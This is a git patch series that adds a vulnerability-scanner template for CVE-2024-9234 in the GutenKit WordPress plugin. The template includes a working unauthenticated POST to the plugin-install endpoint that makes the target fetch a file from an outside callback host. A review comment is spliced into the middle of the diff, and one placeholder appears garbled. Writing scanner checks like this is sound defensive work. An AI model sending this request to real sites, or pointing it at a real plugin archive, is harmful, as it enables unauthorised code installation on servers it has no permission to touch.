From 04aff8570b726295096e9b782e4db767c750ee16 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Sun, 20 Oct 2024 16:53:59 +0300
Subject: [PATCH 1/3] add CVE-2024-9234

---
 http/cves/2024/CVE-2024-9234.yaml | 60 +++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-9234.yaml

diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml
new file mode 100644
index 0000000000..a196cc1f26
--- /dev/null
+++ b/http/cves/2024/CVE-2024-9234.yaml
@@ -0,0 +1,60 @@
+id: CVE-2024-9234
+
+info:
+ name: GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload
+ author: s4e-io
+ severity: critical
+ description: |
+ The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-9234
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon/gutenkit-210-unauthenticated-arbitrary-file-upload
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-9234
+ cwe-id: CWE-862
+ epss-score: 0.00045
+ epss-percentile: 0.16482
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: wpmet
+ product: gutenkit
+ framework: wordpress
+ fofa-query: body="wp-content/plugins/gutenkit-blocks-addon"
+ tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload
+variables:
+ filename: "{{rand_text_alpha(12)}}"
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "/wp-content/plugins/gutenkit-blocks-addon")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ plugin=http://{{interactsh-url}}/{(unknown)}.zip
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body, "Failed to unzip plugin", "success\":false")'
+ - 'contains(content_type, "application/json")'
+ - 'status_code == 200'
+ condition: and
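Review bot: The `filename` variable declared under `variables:` is not visibly referenced anywhere in the template; the only candidate is the `plugin=` body line of the second request, which in this rendering reads `{(unknown)}.zip`, and if that is not `{{filename}}` the variable is dead and should either be used there or dropped. The second request's matcher keys on the failure path (`Failed to unzip plugin` together with `success\":false`), which shows the unauthenticated endpoint reached the remote-fetch code without anything being installed, but the template does not record that this is intentional; a comment above the second `matchers:` such as `# non-zip URL on purpose: the unzip error confirms the missing capability check without installing a plugin` would keep a later maintainer from changing the matcher to expect success. The `info` block has no `remediation:` entry; `remediation: Update GutenKit to a release newer than 2.1.0 that adds the capability check` would match the affected range given in the description. Because the check depends on the target fetching the supplied URL, a host with outbound traffic blocked may return a different error than the unzip message and be reported as not vulnerable; the exact alternative message cannot be confirmed from this hunk.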
From 5ca8034a45bdefb87bff760538b10cda566a11c4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 21 Oct 2024 05:51:40 +0530
Subject: [PATCH 2/3] added missing tag

---
 http/cves/2024/CVE-2024-9234.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml
index a196cc1f26..d518fd0e41 100644
--- a/http/cves/2024/CVE-2024-9234.yaml
+++ b/http/cves/2024/CVE-2024-9234.yaml
@@ -23,7 +23,8 @@ info:
 product: gutenkit
 framework: wordpress
 fofa-query: body="wp-content/plugins/gutenkit-blocks-addon"
- tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload
+ tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive
+
 variables:
 filename: "{{rand_text_alpha(12)}}"

From 16f777353591ade597afb0bc4b9fa0e8fdda75c4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 22 Oct 2024 14:20:22 +0530
Subject: [PATCH 3/3] Update CVE-2024-9234.yaml

---
 http/cves/2024/CVE-2024-9234.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-9234.yaml b/http/cves/2024/CVE-2024-9234.yaml
index d518fd0e41..8f2b1a8721 100644
--- a/http/cves/2024/CVE-2024-9234.yaml
+++ b/http/cves/2024/CVE-2024-9234.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-9234

 info:
- name: GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload
+ name: GutenKit <= 2.1.0 - Arbitrary File Upload
 author: s4e-io
 severity: critical
 description: |